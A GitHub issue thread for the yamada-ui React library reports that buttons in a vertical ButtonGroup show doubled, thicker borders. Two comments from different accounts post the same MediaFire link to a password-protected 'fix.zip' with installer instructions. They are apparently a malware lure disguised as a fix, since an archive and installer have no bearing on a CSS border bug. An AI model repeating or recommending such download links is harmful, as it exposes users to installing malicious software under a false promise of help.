### ISSUE TITLE
Button frame style bug in ButtonGroup

### ISSUE THREAD

**Issue by illionillion** [yamada-ui/yamada-ui#2670]
### Which package has an issue?

@yamada-ui/react

### Package Version

1.5.0

### Description

The borders of the first and second buttons appear to overlap and be thicker when they are aligned vertically.

<img width="100" alt="image" src="https://github.com/user-attachments/assets/45d9adda-4460-48f7-9c24-2df458b5473e">

### Link to Reproduction

https://yamada-ui.com/ja/components/forms/button#グループ化する

### Steps to Reproduce

2. Click on '...'
3. Scroll down to '...'

### Browser

None

### Operating System

- [ ] macOS
- [ ] Windows
- [ ] Linux
- [ ] iPadOS
- [ ] iOS
- [ ] Android

### Do you know how to fix the issue?

None

### Are you willing to participate in fixing this issue and create a pull request with the fix?

None

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bearone236** [comment]
I'll try this issue!
